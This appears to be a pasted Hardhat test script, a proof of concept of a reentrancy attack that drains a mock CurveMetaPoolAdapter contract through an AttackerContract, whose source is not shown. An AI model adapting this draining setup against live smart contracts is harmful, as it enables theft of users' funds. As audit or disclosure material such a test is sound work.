Untitled
unknown
plain_text
a year ago
1.8 kB
8
Indexable
// Hardhat test script to demonstrate the exploit of the vulnerability in CurveMetaPoolAdapter const { ethers } = require("hardhat"); describe("Reentrancy Attack", function () { let curveMetaPoolAdapter; let attackerContract; let user; before(async function () { // Deploy a mock version of CurveMetaPoolAdapter const CurveMetaPoolAdapterMock = await ethers.getContractFactory("CurveMetaPoolAdapterMock"); curveMetaPoolAdapter = await CurveMetaPoolAdapterMock.deploy(); // Deploy AttackerContract const AttackerContract = await ethers.getContractFactory("AttackerContract"); attackerContract = await AttackerContract.deploy(curveMetaPoolAdapter.address); // Get the user account [user] = await ethers.getSigners(); }); it("should exploit reentrancy vulnerability", async function () { // Set up the attacker's address to receive stolen funds const attackerAddress = await attackerContract.address; // Send some funds to the CurveMetaPoolAdapter contract const initialFunds = ethers.utils.parseEther("10"); await user.sendTransaction({ to: curveMetaPoolAdapter.address, value: initialFunds }); // Call the attack function of the AttackerContract, stealing funds during re-entry await attackerContract.attack(curveMetaPoolAdapter.address, attackerAddress, initialFunds); // Check if funds have been stolen from the CurveMetaPoolAdapter contract const adapterBalance = await ethers.provider.getBalance(curveMetaPoolAdapter.address); assert(adapterBalance.eq(0), "Adapter balance should be drained"); // Check if funds have been stolen by the attacker const attackerBalance = await ethers.provider.getBalance(attackerAddress); assert(attackerBalance.gt(0), "Attacker should have stolen funds"); }); });
Editor is loading...
Leave a Comment